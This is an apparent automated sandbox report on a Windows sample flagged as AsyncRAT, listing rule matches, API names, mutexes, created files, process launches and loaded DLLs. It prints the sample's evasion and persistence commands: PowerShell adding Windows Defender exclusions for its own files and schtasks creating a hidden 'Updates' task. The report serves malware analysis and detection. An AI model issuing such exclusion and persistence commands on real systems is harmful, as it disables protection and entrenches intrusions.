                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000000.1265344738.0000000000C26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQudI.exe" vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexraw.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1315917095.0000000006020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308667338.000000000405E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3727198558.0000000003731000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQudI.exe" vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3728206247.0000000005639000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeBinary or memory string: OriginalFilenameQudI.exe" vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: pNYyTm.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, fw1IB4uqclhjXGAZvN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, fw1IB4uqclhjXGAZvN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, fw1IB4uqclhjXGAZvN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/18@1/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile created: C:\Users\user\AppData\Roaming\pNYyTm.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMutant created: \Sessions\1\BaseNamedObjects\Gt5MojO5rBrt6ybL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7132:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile created: C:\Users\user\AppData\Local\Temp\tmp496E.tmpJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeVirustotal: Detection: 36%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\pNYyTm.exe C:\Users\user\AppData\Roaming\pNYyTm.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess created: C:\Users\user\AppData\Roaming\pNYyTm.exe "C:\Users\user\AppData\Roaming\pNYyTm.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess created: C:\Users\user\AppData\Roaming\pNYyTm.exe "C:\Users\user\AppData\Roaming\pNYyTm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
